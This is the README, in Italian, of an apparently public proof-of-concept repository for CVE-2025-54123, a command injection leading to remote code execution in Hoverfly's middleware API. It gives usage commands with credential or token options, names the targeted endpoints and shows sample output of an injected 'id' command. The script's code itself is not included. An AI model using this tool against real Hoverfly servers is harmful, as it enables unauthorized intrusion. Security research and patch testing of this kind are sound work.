
Prova di concetto in Python per CVE-2025-54123, che dimostra l'iniezione di comandi fino a RCE nell'API middleware di Hoverfly con autenticazione basata su credenziali o token.
Questo repository contiene uno script proof-of-concept (PoC) in Python per interagire con istanze Hoverfly affette da CVE-2025-54123.
Lo script supporta:
Avvertenza
Questo progetto è inteso esclusivamente per ricerca sulla sicurezza autorizzata, test e scopi educativi. Non utilizzarlo contro sistemi senza esplicita autorizzazione.
Installa le dipendenze:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| Argomento | Descrizione |
|---|---|
--target | Dominio o indirizzo IP di destinazione |
--port | Porta del servizio di destinazione |
-u | Nome utente Hoverfly |
-p | Password Hoverfly |
--token | Bearer token esistente |
--cmd | Stringa di comando fornita all'endpoint middleware |
Quando vengono fornite le credenziali:
/api/token-auth
Lo script comunica con:
/api/v2/hoverfly/middleware
utilizzando una richiesta PUT autenticata.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
Questo repository è fornito esclusivamente per scopi educativi, di sicurezza difensiva e di test autorizzati. L'autore declina ogni responsabilità per uso improprio, danni o conseguenze legali derivanti dall'uso di questo software.